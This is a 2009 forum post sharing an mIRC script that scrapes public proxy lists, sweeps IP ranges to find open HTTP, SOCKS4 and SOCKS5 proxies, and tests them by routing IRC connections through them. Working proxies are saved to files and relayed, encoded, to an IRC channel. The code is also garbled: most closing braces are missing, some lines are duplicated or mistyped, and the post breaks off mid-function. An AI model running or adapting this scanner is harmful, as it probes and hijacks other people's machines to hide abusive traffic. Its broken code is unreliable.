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www.waraxe.us Forum Index -> Proxy database -> Proxy&Socks Scanner + leecher
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Proxy&Socks Scanner + leecher
PostPosted: Sat Aug 08, 2009 4:24 pm Reply with quote
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Joined: Aug 01, 2007
Posts: 38
Location: Canada,Qc

Put in remotes of mIRC (ALT+R) click Ok. Type: /leech
Need mIRCv6.21 or higher

alias varset {
unset %incvar
inc %incvar
set % $+ $left($gettok($1,%incvar,59),1) $right($gettok($1,%incvar,59),1)
if (%incvar >= $numtok($1,59)) return
goto varset

on 1:SOCKOPEN:p-l*:{
if ($sockerr) return
sockwrite -n $sockname GET http://proxies.my-proxy.com/proxy-list- $+ $remove($sockname,p-l) $+ .html HTTP/1.0
sockwrite -n $sockname $crlf
on 1:SOCKREAD:p-l*:{
sockread -fn &buffer
if (*.*.*.*:* iswm $bvar(&buffer,1,200).text) {
%inc.a = 0
%MAX.a = $bvar(&buffer,0)
while (%inc.a < %max.a) {
inc %inc.a 300
%text.a = $bvar(&buffer,$calc(%inc.a -299),%inc.a).text
%maximum = $numtok(%text.a,60)
set %incthashit 1
while (%incthashit < %maximum) { sc4n $gettok(%text.a,%incthashit,60) | inc %incthashit }
elseif (%inc.a >= %max.a) {
%text.a = $bvar(&buffer,$calc(%inc.a -299),%max.a).text
%maximum = $numtok(%text.a,60)
set %incthashit 1
while (%incthashit < %maximum) { sc4n $gettok(%text.a,%incthashit,60) | inc %incthashit }
unset %inc.a,%max.a
on 1:SOCKOPEN:nntime*:{
if ($sockerr) return
sockwrite -n $sockname GET http://nntime.com/proxy-list- $+ $remove($sockname,nntime) $+ .htm HTTP/1.0
sockwrite -n $sockname $crlf
on 1:SOCKREAD:nntime*:{
sockread -n %temp
;echo -a $htmlfree(%temp)
if ($getiphost2($htmlfree(%temp))) sc4n $getiphost2($htmlfree(%temp))
on 1:SOCKOPEN:sworld*:{
if ($sockerr) return
sockwrite -n $sockname GET http://socks-world.blogspot.com/ HTTP/1.0
sockwrite -n $sockname $crlf
on 1:SOCKREAD:sworld*:{
sockread -n %temp
;echo -a $htmlfree(%temp)
if ($getiphost2($htmlfree(%temp))) s4.scan $getiphost2($htmlfree(%temp))
if ($getiphost2($htmlfree(%temp))) s5.scan $getiphost2($htmlfree(%temp))

alias leech {
echo @proxyscan 4 $+ $timestamp * Now leeching proxy-lists over the web, mIRC might freeze (if so use CTRL + BREAK)
.timeralive -o 1 5 sockopen alive aliveproxylist.blogspot.com 80
.timerNNtime 1 1 sockopen nntime01 nntime.com 80
.timerproxy4free -o 1 5 sockopen pxy4free1 www.proxy4free.com 80
.timerproxy4free1 -o 1 15 sockopen pxy4free2 www.proxy4free.com 80
.timeranonchk -o 1 5 sockopen anonchk1 www.anonymitychecker.com 80
.timeranonchk1 -o 1 15 sockopen anonchk2 www.anonymitychecker.com 80
.timerspl -o 1 0 sockopen xspl socksproxylists.com 80
.timernn2 1 $calc(10*1) sockopen nntime02 nntime.com 80
.timernn3 1 $calc(10*2) sockopen nntime03 nntime.com 80
.timernn4 1 $calc(10*3) sockopen nntime04 nntime.com 80
.timernn5 1 $calc(10*4) sockopen nntime05 nntime.com 80
.timernn6 1 $calc(10*5) sockopen nntime06 nntime.com 80
.timernn7 1 $calc(10*6) sockopen nntime07 nntime.com 80
.timernn8 1 $calc(10*7) sockopen nntime08 nntime.com 80
.timernn9 1 $calc(10*8) sockopen nntime09 nntime.com 80
.timernn10 1 $calc(10*9) sockopen nntime10 nntime.com 80
.timernn11 1 $calc(10*10) sockopen nntime11 nntime.com 80
.timernn12 1 $calc(10*11) sockopen nntime12 nntime.com 80
.timernn13 1 $calc(10*12) sockopen nntime13 nntime.com 80
.timernn14 1 $calc(10*13) sockopen nntime14 nntime.com 80
.timernn15 1 $calc(10*14) sockopen nntime15 nntime.com 80
.timernn16 1 $calc(10*15) sockopen nntime16 nntime.com 80
sockopen p-l1 proxies.my-proxy.com 80
.timersworld 1 1 sockopen sworld socks-world.blogspot.com 80
.timerpmp2 1 $calc(10*1) sockopen p-l2 proxies.my-proxy.com 80
.timerpmp3 1 $calc(10*2) sockopen p-l3 proxies.my-proxy.com 80
.timerpmp4 1 $calc(10*3) sockopen p-l4 proxies.my-proxy.com 80
.timerpmp5 1 $calc(10*4) sockopen p-l5 proxies.my-proxy.com 80
.timerpmp6 1 $calc(10*5) sockopen p-l6 proxies.my-proxy.com 80
.timerpmp7 1 $calc(10*6) sockopen p-l7 proxies.my-proxy.com 80
.timerpmp8 1 $calc(10*7) sockopen p-l8 proxies.my-proxy.com 80
.timerpmp9 1 $calc(10*8) sockopen p-l9 proxies.my-proxy.com 80
.timerpmp10 1 $calc(10*9) sockopen p-l10 proxies.my-proxy.com 80
.timerpmp11 1 $calc(10*10) sockopen p-ls1 proxies.my-proxy.com 80
.timerpmp12 1 $calc(10*11) sockopen p-ls2 proxies.my-proxy.com 80
.timerpmp13 1 $calc(10*12) sockopen p-ls3 proxies.my-proxy.com 80
.timersam1 1 10 sockopen sam01 samair.ru 80
.timersam2 1 $calc(10*2) sockopen sam02 samair.ru 80
.timersam3 1 $calc(10*3) sockopen sam03 samair.ru 80
.timersam4 1 $calc(10*4) sockopen sam04 samair.ru 80
.timersam5 1 $calc(10*5) sockopen sam05 samair.ru 80
.timersam6 1 $calc(10*6) sockopen sam06 samair.ru 80
.timersam7 1 $calc(10*7) sockopen sam07 samair.ru 80
.timersam8 1 $calc(10*8) sockopen sam08 samair.ru 80
.timersam9 1 $calc(10*9) sockopen sam09 samair.ru 80
.timersam10 1 $calc(10*10) sockopen sam10 samair.ru 80
.timersam11 1 $calc(10*11) sockopen sam11 samair.ru 80
.timersam12 1 $calc(10*12) sockopen sam12 samair.ru 80
.timersam13 1 $calc(10*13) sockopen sam13 samair.ru 80
.timersam14 1 $calc(10*14) sockopen sam14 samair.ru 80
.timersam15 1 $calc(10*15) sockopen sam15 samair.ru 80
.timersam16 1 $calc(10*16) sockopen sam16 samair.ru 80
.timersam17 1 $calc(10*17) sockopen sam17 samair.ru 80
.timersam18 1 $calc(10*18) sockopen sam18 samair.ru 80
.timersam19 1 $calc(10*19) sockopen sam19 samair.ru 80
.timersam20 1 $calc(10*20) sockopen sam20 samair.ru 80
.timersam21 1 $calc(10*21) sockopen sam21 samair.ru 80
.timersam22 1 $calc(10*22) sockopen sam22 samair.ru 80
.timersam23 1 $calc(10*23) sockopen sam23 samair.ru 80
.timersam24 1 $calc(10*24) sockopen sam24 samair.ru 80
.timerAntiproxy -o 1 250 sockopen anti proxy.antipalivo.ru 80
.timerLEECH -o 0 3600 leech
on 1:SOCKOPEN:sam*:{
if ($sockerr) { return }
sockwrite -n $sockname GET http://samair.ru/proxy/proxy- $+ $right($sockname,2) $+ .htm HTTP/1.0
sockwrite -n $sockname $crlf
on 1:SOCKREAD:sam*:{
sockread -fn &buffer
%max.b = $wildtok($bvar(&buffer,1,$bvar(&buffer,0)).text,*.*.*.*:*,0,60)
%inc.b = 0
while (%max.b > %inc.b) { sc4n $wildtok($bvar(&buffer,1,$bvar(&buffer,0)).text,*.*.*.*:*,%inc.b,60) | inc %inc.b }
on 1:SOCKREAD:alive*:{
sockread -n %temp
if ($getiphost2(%temp)) {
if (*Protocol*SOCKS4* iswm %temp) {
s4.scan $getiphost2($gettok(%temp,1,44))
s4.scan $getiphost2($gettok(%temp,2,44))
s4.scan $getiphost2($gettok(%temp,3,44))
s4.scan $getiphost2($gettok(%temp,4,44))
s4.scan $getiphost2($gettok(%temp,5,44))
s4.scan $getiphost2($gettok(%temp,6,44))
s4.scan $getiphost2($gettok(%temp,7,44))
s4.scan $getiphost2($gettok(%temp,8,44))
s4.scan $getiphost2($gettok(%temp,9,44))
s4.scan $getiphost2($gettok(%temp,10,44))
s4.scan $getiphost2($gettok(%temp,11,44))
s4.scan $getiphost2($gettok(%temp,12,44))
s4.scan $getiphost2($gettok(%temp,13,44))
s4.scan $getiphost2($gettok(%temp,14,44))
s4.scan $getiphost2($gettok(%temp,15,44))
s4.scan $getiphost2($gettok(%temp,16,44))
s4.scan $getiphost2($gettok(%temp,17,44))
s4.scan $getiphost2($gettok(%temp,18,44))
goto end
elseif (*Protocol*SOCKS5* iswm %temp) {
s5.scan $getiphost2($gettok(%temp,1,44))
s5.scan $getiphost2($gettok(%temp,2,44))
s5.scan $getiphost2($gettok(%temp,3,44))
s5.scan $getiphost2($gettok(%temp,5,44))
s5.scan $getiphost2($gettok(%temp,5,44))
s5.scan $getiphost2($gettok(%temp,6,44))
s5.scan $getiphost2($gettok(%temp,7,44))
s5.scan $getiphost2($gettok(%temp,8,44))
s5.scan $getiphost2($gettok(%temp,9,44))
s5.scan $getiphost2($gettok(%temp,10,44))
s5.scan $getiphost2($gettok(%temp,11,44))
s5.scan $getiphost2($gettok(%temp,12,44))
s5.scan $getiphost2($gettok(%temp,13,44))
s5.scan $getiphost2($gettok(%temp,15,44))
s5.scan $getiphost2($gettok(%temp,15,44))
s5.scan $getiphost2($gettok(%temp,16,44))
s5.scan $getiphost2($gettok(%temp,17,44))
s5.scan $getiphost2($gettok(%temp,18,44))
goto end
else {
sc4n $getiphost2($gettok(%temp,1,44))
sc4n $getiphost2($gettok(%temp,2,44))
sc4n $getiphost2($gettok(%temp,3,44))
sc4n $getiphost2($gettok(%temp,5,44))
sc4n $getiphost2($gettok(%temp,5,44))
sc4n $getiphost2($gettok(%temp,6,44))
sc4n $getiphost2($gettok(%temp,7,44))
sc4n $getiphost2($gettok(%temp,8,44))
sc4n $getiphost2($gettok(%temp,9,44))
sc4n $getiphost2($gettok(%temp,10,44))
sc4n $getiphost2($gettok(%temp,11,44))
sc4n $getiphost2($gettok(%temp,12,44))
sc4n $getiphost2($gettok(%temp,13,44))
sc4n $getiphost2($gettok(%temp,15,44))
sc4n $getiphost2($gettok(%temp,15,44))
sc4n $getiphost2($gettok(%temp,16,44))
sc4n $getiphost2($gettok(%temp,17,44))
sc4n $getiphost2($gettok(%temp,18,44))
.timerOFF $+ $sockname 1 5 sockclose $sockname
on 1:SOCKOPEN:alive*:{
if ($sockerr) return
sockwrite -n $sockname GET http://aliveproxylist.blogspot.com/ HTTP/1.0
sockwrite -n $sockname $crlf
on 1:SOCKREAD:proxy4free*:{
sockread -n %temp
%hfreedtxt = $htmlfree(%temp)
if ($getiphost2(%hfreedtxt)) { sc4n $v1 | goto end }
if (%hfreedtxt != $null) && ($gettok(%hfreedtxt,1,46) isnum) && ($gettok(%hfreedtxt,2,46) isnum) && ($gettok(%hfreedtxt,3,46) isnum) && ($gettok(%hfreedtxt,4,46) isnum) set %pxytmp $wildtok(%hfreedtxt,*.*.*.*,1,32)
if (%hfreedtxt != $null) && (*.*.*.* iswm %pxytmp) && (%hfreedtxt isnum) { sc4n $getiphost2(%pxytmp %hfreedtxt) | unset %pxytmp }

on 1:SOCKOPEN:proxy4free*:{
if ($sockerr) return
unset %hfreedtxt,%pxytmp
sockwrite -n $sockname GET http://www.proxy4free.com/page $+ $remove($sockname,proxy4free) $+ .html HTTP/1.0
sockwrite -n $sockname $crlf
on 1:SOCKREAD:anonchk*:{
sockread -n %temp11
%hfreedtxt1 = $htmlfree(%temp11)
if ($getiphost2(%hfreedtxt11)) { sc4n $v1 | goto end }
if (%hfreedtxt11 != $null) && ($gettok(%hfreedtxt11,1,46) isnum) && ($gettok(%hfreedtxt11,2,46) isnum) && ($gettok(%hfreedtxt11,3,46) isnum) && ($gettok(%hfreedtxt11,4,46) isnum) set %pxytmp1 $wildtok(%hfreedtxt11,*.*.*.*,1,32)
if (%hfreedtxt11 != $null) && (*.*.*.* iswm %pxytmp11) && (%hfreedtxt11 isnum) { sc4n $getiphost2(%pxytmp11 %hfreedtxt11) | unset %pxytmp11 }
on 1:SOCKOPEN:anonchk*:{
if ($sockerr) return
unset %hfreedtxt11,%pxytmp11
sockwrite -n $sockname GET http://www.anonymitychecker.com/page $+ $remove($sockname,anonchk) $+ .html HTTP/1.0
sockwrite -n $sockname $crlf
on 1:SOCKREAD:spl*:{
sockread -n %temp1
%hfreedtxt1 = $htmlfree(%temp1)
inc %inc.x
if (*@SOCKS4* iswm $gettok(%hfreedtxt1,%inc.x,13)) { s4.scan $getiphost2($v2) }
if (*@SOCKS5* iswm $gettok(%hfreedtxt1,%inc.x,13)) { s5.scan $getiphost2($v2) }
if (30 >= %inc.x) goto inc
unset %inc.x
on 1:SOCKOPEN:spl*:{
if ($sockerr) return
unset %hfreedtxt1,%pxytmp1
sockwrite -n $sockname GET http://www.socksproxylists.com/SocksProxyLists/ $+ $sock($sockname).mark HTTP/1.0
sockwrite -n $sockname $crlf
on 1:SOCKREAD:xspl*:{
sockread -n %temp1
if (*a*href*.htm* iswm %temp1) {
set %xspl $remove($wildtok(%temp1,*.htm*,1,32),href=,",$chr(62))
%xtmp = SPL $+ $r(0,99999)
sockopen %xtmp $sock($sockname).ip 80
sockmark %xtmp %xspl
.timerOFF $+ $sockname 1 5 sockclose $sockname
on 1:SOCKOPEN:xspl*:{
if ($sockerr) return
unset %hfreedtxt1,%pxytmp1
sockwrite -n $sockname GET http://www.socksproxylists.com/SocksProxyLists/ HTTP/1.0
sockwrite -n $sockname $crlf
on 1:SOCKREAD:anti*:{
sockread -n &buffer
%hfreedtxt2 = $htmlfree($bvar(&buffer,1,$bvar(&buffer,0)).text)
if (*Proxy*list* iswm %hfreedtxt2) { %type1 = pxy }
if (*SOCKS4* iswm %hfreedtxt2) { %type1 = s4 }
if (*SOCKS5* iswm %hfreedtxt2) { %type1 = s5 }
if (*name*=*'*';* iswm %hfreedtxt2) set %pxytmp2 $remove(%hfreedtxt2,name,=,',;)
if (port*=*;* iswm %hfreedtxt2) {
set %port $+ $gettok($remove(%hfreedtxt2,port),1,32) $remove($gettok(%hfreedtxt2,3,32),;)
if (*=*+*/*;* iswm %hfreedtxt2) {
%eval = % $+ $gettok(%hfreedtxt2,3,32)
%evall = $eval([ [ %eval ] ],1)
set %parsed $calc(%evall + $gettok(%hfreedtxt2,5-6,32) $remove($gettok(%hfreedtxt2,7,32),;))
if (%type1 == pxy) sc4n %pxytmp2 %parsed
if (%type1 == s4) s4.scan %pxytmp2 %parsed
if (%type1 == s5) s5.scan %pxytmp2 %parsed
unset %port*,%parsed,%pxytmp2

on 1:SOCKOPEN:anti*:{
if ($sockerr) return
unset %port*,%parsed,%pxytmp2
sockwrite -n $sockname GET http://proxy.antipalivo.ru/ HTTP/1.0
sockwrite -n $sockname $crlf
alias sc5nfile { s5.scan $1- }
alias sc4nfile { s4.scan $1- }
alias htmlfree return $regsubex($$1-,/^[^<]*>|<[^>]*>|<[^>]*$/g,)
alias sc4n {
if (*.*.*.* iswm $1-) && ($1 != x) && ($2) {
if (666* !iswm $2) && (7000 != $2) {
if ($read($pxy,w,* $+ $1 $+ *) != $null) { echo @proxyscan $1 $2 Already in list, halted scan. | halt }
echo @Proxyscan Scanning: $1 $2
sockopen scan $+ $r(0,99999999999999) $1 $2
if ($getiphost2($1-)) {
if ($read($pxy,w,* $+ $gettok($getiphost2($1-),1,32) $+ *) != $null) { echo @proxyscan $1 $2 Already in list, halted scan. | goto next }
echo @Proxyscan Scanning: $getiphost2($1-)
sockopen scan $+ $r(0,99999999999999) $getiphost2($1-)
goto next
if (*.*.*.* !iswm $1-) goto next
if ($read($pxy,w,* $+ $wildtok($1-,*.*.*.*,1,32) $+ *) != $null) { echo @Proxyscan $wildtok($1-,*.*.*.*,1,32) Already in list, halted scan. | goto next }
alias setinterval {
echo -a To run the script without problem try an interval between 500 and 5000
%interval = $?="Enter interval in milliseconds, 1 to 10000 "
if (!$!) || ($! >= 10000) goto restart
alias scan.win { %def.s = $def.s | %def.p = 6667 | %def.c = proxies | if (%interval == $null) set %interval 1 | if ($window(@proxyscan) == $null) { localinfo | window -e @proxyscan } }
alias selectmultiplefile { set %sfiles $nopath($shortfn($msfile($mircdir,CHOSE PROXY FILES,SCAN))) | :incthat | inc %sinc | if (%sinc > %sfiles) { unset %sinc | halt } | /pxyfile $shortfn($msfile(%sinc)) %interval | goto incthat }
menu @proxyscan,menubar {
[-Proxy Scan-]
.Leech Proxy Now!:leech
.Show window: scan.win | window -a @proxyscan | echo @proxyscan Paste your proxies here
.Set interval of scan: setinterval
.Show good proxies: /run $pxy
.Sort proxy list: /filterfile $pxy
.Scan multiple proxy files: selectmultiplefile
.Abort scanning: abord | /SOCKCLOSE SCAN*
.Clear window: /clear
.Hide window: window -h @proxyscan
.Proxy lists
..ProxyGod: run http://proxygod.com.com/
..My-Proxy forum: run http://forum.my-proxy.com/?from=menu
..Xorum: run http://www.xroxy.com/xorum/
..Proxy4Free: run http://www.proxy4free.com
..PublicProxyServers:run http://www.publicproxyservers.com/page1.html
..AnonymityChecker:run http://www.anonymitychecker.com/page1.html
..Proxz:run http://www.proxz.com/
..MultiProxy:run http://www.multiproxy.org/anon_proxy.htm
..Samair:run http://www.samair.ru/proxy/
..Aliveproxy:run http://www.aliveproxy.com/us-proxy-list/
..HighAnonimity: run http://highanonymity.com/
..mazafaka: run http://proxy.mazafaka.ru/

alias pxy return IRCproxys.txt
alias abord { play stop }
on *:INPUT:@Proxyscan:{
if (/ !isin $1) && ($getiphost2($1-)) {
write temp $getiphost2($1-)
.timerscanfile 1 1 .pxyfile temp %interval
.timerscanfileoff 1 1.1 .remove temp
if (!$getiphost2($1-)) && ($wildtok($1-,*.*.*.*,1,32)) sc4n $wildtok($1-,*.*.*.*,1,32)
alias sk {
write $pxy $sock($sockname).ip $+ : $+ $sock($sockname).port
if ($sock(scan_).mark == c) && ($wildtok(%msg,*,0,32) == 3) { sockwrite -n scan_ privmsg $chr(35) $+ $gettok(%def.c,1,32) : $+ $colourencode(p %msg) | unset %msg }
set %radi $read($allpxy,w,* $+ %scan.ip $+ : $+ %scan.port $+ *)
if (!%radi) write $allpxy %scan.ip $+ : $+ %scan.port
on *:sockopen:scan*:{
if ($sock(scan_).name == $null) { sockopen scan_ $def.s %def.p }
if ($sockerr > 0) {
if (_ isin $sockname) { .timersS 1 90 sockopen scan_ $def.s %def.p }
if (_ !isin $sockname) echo 15 @proxyscan $sock($sockname).ip $sock($sockname).port Error ( $+ $sock($sockname).wsmsg $+ )
if (_ !isin $sockname) {
sockwrite -n $sockname CONNECT $def.s $+ : $+ %def.p HTTP/1. $+ $r(0,1) $+ $crlf
sockwrite -n $sockname $crlf
sockwrite -n $sockname $crlf
sockwrite -n $sockname $crlf
alias codedipport { return $base($longip($gettok($1,1,58)),10,36) $+ : $+ $base($gettok($1,2,58),10,36) }
alias dcodedipport { return $longip($base($gettok($1,1,58),36,10)) $+ : $+ $base($gettok($1,2,58),36,10) }
alias success { echo @proxyscan 3* $1- | if ($wildtok(%msg,*,0,32) >= 3) unset %msg | %msg = $codedipport($2) %msg | sk }
on 1:SOCKCLOSE:SCAN_:.timersS 1 90 sockopen scan_ $def.s %def.p
alias allpxy return ALL.txt
alias portclose { sockclose $1 }
on *:SOCKREAD:scan*:{
sockread %scan
tokenize 32 %scan
set %scan.ip $sock($sockname).ip
set %scan.port $sock($sockname).port
if (PING == $gettok(%scan,1,32)) sockwrite -n $sockname PONG $remove($2,:)
if (ERROR isin $1) && (_ isin $sockname) .timersS 1 90 sockopen scan_ $def.s %def.p
if (001 == $gettok(%scan,2,32)) && (_ isin $sockname) { sockmark $sockname c | kk }
if (404 == $gettok(%scan,2,32)) .timer404 1 10 kk
if (*NOTICE AUTH* iswmcs $1-3) && (_ isin $sockname) && (!$sock($sockname).mark) { sockmark $sockname C | localinfo | sockwrite -n $sockname USER $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) "." "." : $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) | sockwrite -n $sockname NICK : $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) | sockwrite -n $sockname JOIN :# $+ $gettok(%def.c,1,32) : $+ $gettok(%def.c,2,32) }
if (451 == $gettok(%scan,2,32)) || (43* iswm $gettok(%scan,2,32)) && (_ isin $sockname) { %AV = $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) | sockwrite -n $sockname USER %av "." "." : $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) | sockwrite -n $sockname NICK : $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) }
if (HTTP/* iswm $gettok(%scan,1,32)) {
if ($gettok(%scan,2,32) > 200) { echo 4 @proxyscan Bad: $sock($sockname).ip $+ : $+ $sock($sockname).port ( $+ $iif(Method not allowed iswm $3-,CoDeeN Proxy,$3-) $+ ) | sockclose $sockname | return }
if ($gettok(%scan,2,32) == 200) { echo @proxyscan %scan.ip $+ : $+ %scan.port is connecting... | sockwrite -n $sockname $crlf | sockwrite -n $sockname $crlf }
if (*NOTICE AUTH* iswmcs $gettok(%scan,1-3,32)) && (_ !isin $sockname) || (ERROR: == $1) && (_ !isin $sockname) {
set %readi $read($pxy,w,* $+ $sock($sockname).ip $+ *)
if (%readi == $null) {
success * $sock($sockname).ip $+ : $+ $sock($sockname).port WORKING!
unset %redi | unset %radi
sockclose $sockname
if (%readi != $null) {
$pb * $sock($sockname).ip $+ : $+ $sock($sockname).port WORKING!
unset %redi | unset %radi
sockclose $sockname
unset %readi
unset %scan
on 1:sockclose:scan*:echo 4 @proxyscan $sock($sockname).ip $+ : $+ $sock($sockname).port Connection Terminated.
alias kk if ($sock($sockname).mark == c) sockwrite -n $sockname JOIN $chr(35) $+ $gettok(%def.c,1,32) : $+ $gettok(%def.c,2,32)
alias pb return echo @proxyscan
alias scanfile { sc4n $iif($getiphost2($1-),$getiphost2($1-),$2) }
alias pxyfile { play -a scanfile @proxyscan $1 $2 }
alias range {
unset %range*
set %range1 $gettok($1,1,46)
set %range2 $gettok($1,2,46)
set %range3 $gettok($1,3,46)
.timerRANGEr -om 0 300 next $2-
sockwrite -n scan_ $chr(35) $+ $gettok(%def.c,1,32) $colourencode(Starting at $1 on Port $2 Sv $+ $3 )
menu menubar {
Open Socks Scanner: window -e @sock4 | window -e @sock5
alias next {
set %temp $r(0,999999999999)
if ($sock(s $+ $2 $+ chk $+ %temp).name != $null) goto START
inc %range4
sockopen s $+ $2 $+ chk $+ %temp %range1 $+ . $+ %range2 $+ . $+ %range3 $+ . $+ %range4 $1
goto next
if (%range4 >= 255) { inc %range3 | set %range4 0 }
if (%range3 >= 255) { inc %range2 | set %range3 0 }
if (%range2 >= 255) { unset %range* | sockwrite -n scan_ PRIVMSG : $+ $chr(35) $+ $gettok(%def.c,1,32) $colourencode(Scan halted.) | .timerRANGE off | halt }
on *:INPUT:@sock5:{
write temp.s5 $getiphost2($1-)
.timerscans5file 1 1 .s5file temp.s5 %interval
.timerscans5fileoff 1 1.1 .remove temp.s5
on *:INPUT:@sock4:{
write temp.s4 $getiphost2($1-)
.timerscans4file 1 1 .s4file temp.s4 %interval
.timerscans4fileoff 1 1.1 .remove temp.s4
alias s5.scan {
if (!$1) goto END
window -e @sock5
if ($read(sock5.txt,w,* $+ $gettok($1,1,58) $+ *) != $null) { echo @sock5 $gettok($1,1,58) Already in list | goto END }
if (*.*.*.* iswm $1) && (*.*.*.*:* !iswm $1) {
if ($read(sock5.txt,w,* $+ $1 $+ *) == $null) {
sockopen s5chk $+ $r(0,9999999) $1 $2
echo @sock5 Scanning: $1 $2
elseif (*.*.*.*:* iswm $1-) && ($read(sock5.txt,w,* $+ $getiphost2($1-) $+ *) == $null) {
sockopen s5chk $+ $r(0,9999999) $getiphost2($1-)
echo @sock5 Scanning: $getiphost2($1-)
if ($1) && (!$2) && (: !isin $1) sc4n $1
menu @sock5 {
Scan SOCK5 IP range:range $?="IP:" $?="Port" 5
Check current SOCK5 list: /run sock5.txt
Sort file: /filterfile sock5.txt
Set interval of scan:setinterval
Scan multiple SOCK5 files: selectmultiplefiles5
ABORT SCANS: .play stop | .timerranger off | sockclose *chk*
Clear: /clear
alias selectmultiplefiles5 { set %sfiles $nopath($shortfn($msfile($mircdir,CHOSE SOCK5 FILES,SCAN))) | :incthat | inc %sinc | if (%sinc > %sfiles) { unset %sinc | halt } | /s5file $shortfn($msfile(%sinc)) %interval | goto incthat }
alias selectmultiplefiles4 { set %sfiles $nopath($shortfn($msfile($mircdir,CHOSE SOCK4 FILES,SCAN))) | :incthat | inc %sinc | if (%sinc > %sfiles) { unset %sinc | halt } | /s4file $shortfn($msfile(%sinc)) %interval | goto incthat }
menu @sock4 {
Scan SOCK4 IP range:range $?="IP:" $?="Port" 4
Check current SOCK4 list: /run sock4.txt
Sort list: /filterfile sock4.txt
Set interval of scan: setinterval
Scan multiple SOCK4 files: selectmultiplefiles4
ABORT SCANS: .play stop | .timer* off | sockclose *chk*
Clear: clear
alias s4.scan {
if (!$1) goto END
window -e @sock4
if ($read(sock4.txt,w,* $+ $gettok($1,1,58) $+ *) != $null) { echo @sock4 $gettok($1,1,58) Already in list | goto END }
if (*.*.*.* iswm $1) && (*.*.*.*:* !iswm $1) {
if ($read(sock4.txt,w,* $+ $1 $+ *) == $null) {
sockopen s4chk $+ $r(0,9999999) $1 $2
echo @sock4 Scanning: $1 $2
elseif (*.*.*.*:* iswm $1-) && ($read(sock5.txt,w,* $+ $getiphost2($1-) $+ *) == $null) {
sockopen s4chk $+ $r(0,9999999) $getiphost2($1-)
echo @sock4 Scanning: $getiphost2($1-)
if ($1) && (!$2) && (: !isin $1) sc4n $1
on *:sockopen:s5chk*:{
if ($sock(scan_).name == $null) { sockopen scan_ $def.s %def.p }
if ($sockerr) { echo 15 @sock5 * Error $sock($sockname).ip $+ : $+ $sock($sockname).port ( $+ $sock($sockname).wsmsg $+ ) | return }
set %s5time $ticks
.bset &bvar5 1 5 1 0
.sockwrite -n $sockname &bvar5
.bunset &bvar5
on *:sockread:s5chk*:{
if ($sockbr) { return }
.sockread &bsocks5
if ($bvar(&bsocks5,1,2) != 5 0) { echo 4 @sock5 Bad $sock($sockname).ip $+ : $sock($sockname).port return $bvar(&bsocks5,2-) | return }
if ($bvar(&bsocks5,1,2) == 5 0) && ($bvar(&bsocks5,3) != 0) {
%def.s = $def.s
bset &socks5 1 5 1 0 1 $replace(%def.s,.,$chr(32)) $gettok($longip(%def.p),3,46) $gettok($longip(%def.p),4,46)
.sockwrite -n $sockname &socks5
.bunset &socks5
sockrename $sockname chks5 $+ $remove($sockname,s5chk)
on 1:SOCKREAD:chks5*:{
sockread %socks5
tokenize 32 %socks5
if (*NOTICE AUTH* iswmcs $1-3) && (!$sock($sockname).mark) || (ERROR: == $1) && (!$sock($sockname).mark) {
sockmark $sockname c
window -e @sock5
suces5 $sock($sockname).ip $+ : $+ $sock($sockname).port $calc($ticks - %s4time) $+ ms
unset %s5time
;sockrename $sockname idle $+ $r(0,999999999)
sockclose $sockname
alias suces4 { echo @sock4 3* $1- | if ($wildtok(%msgs4,*,0,32) >= 3) unset %msgs4 | set %msgs4 $codedipport($1) %msgs4 | sk4 }
alias suces5 { echo @sock5 3* $1- | if ($wildtok(%msgs5,*,0,32) >= 3) unset %msgs5 | set %msgs5 $codedipport($1) %msgs5 | sk5 }
alias sk4 {
if ($sock(scan_).mark == c) && ($wildtok(%msgs4,*,0,32) == 3) { sockwrite -n scan_ privmsg $chr(35) $+ $gettok(%def.c,1,32) : $+ $colourencode(4 %msgs4) | unset %msgs4 }
%rad = sock4.txt
set %rady $read(%rad,w,* $+ $sock($sockname).ip $+ : $+ $sock($sockname).port $+ *)
if (!%rady) write %rad $sock($sockname).ip $+ : $+ $sock($sockname).port
unset %rad*
alias sk5 {
if ($sock(scan_).mark == c) && ($wildtok(%msgs5,*,0,32) == 3) { sockwrite -n scan_ privmsg $chr(35) $+ $+ $gettok(%def.c,1,32) : $+ $colourencode(5 %msgs5) | unset %msgs5 }
%red = sock5.txt
set %redy $read(%red,w,* $+ $sock($sockname).ip $+ : $+ $sock($sockname).port $+ *)
if (!%redy) write %red $sock($sockname).ip $+ : $+ $sock($sockname).port
unset %red*
on *:sockopen:s4chk*:{
if ($sock(scan_).name == $null) { sockopen scan_ $def.s %def.p }
if ($sockerr) { echo 15 @sock4 * Error $sock($sockname).ip $+ : $+ $sock($sockname).port ( $+ $sock($sockname).wsmsg $+ ) | return }
set %s4time $ticks
%def.s = $def.s
.bset &bvar4 1 4 1 $gettok($longip(%def.p),3,46) $gettok($longip(%def.p),4,46) $replace(%def.s,.,$chr(32)) 0
.sockwrite $sockname &bvar4
.bunset &bvar4
ON *:SOCKREAD:s4chk*:{
if ($sockbr) { return }
.sockread &bsocks4
if ($bvar(&bsocks4,2) != 90) { echo 4 @sock4 Bad $sock($sockname).ip $+ : $sock($sockname).port return $bvar(&bsocks4,2-) | return }
if ($bvar(&bsocks4,2) == 90) {
window -e @sock4
suces4 $sock($sockname).ip $+ : $+ $sock($sockname).port $calc($ticks - %s4time) $+ ms
unset %s4.time
;sockrename $sockname idle $+ $r(0,999999999)
sockclose $sockname
on 1:SOCKCLOSE:s5*:{ echo 4 @sock5 * $sock($sockname).ip $+ : $+ $sock($sockname).port Connection Terminated. | return }
on 1:SOCKCLOSE:s4*:{ echo 4 @sock4 * $sock($sockname).ip $+ : $+ $sock($sockname).port Connection Terminated. | return }
alias def.s return
alias scans4file { s4.scan $getiphost2($1-) }
alias s4file { play -a scans4file @sock4 $1- }
alias scans5file { s5.scan $getiphost2($1-) }
alias s5file { play -a scans5file @sock5 $1- }
alias ColourEncode {
var %c.1
var %k.1 = $chr(3)
var %s.1 = $chr(44)
var %x.1 = 1
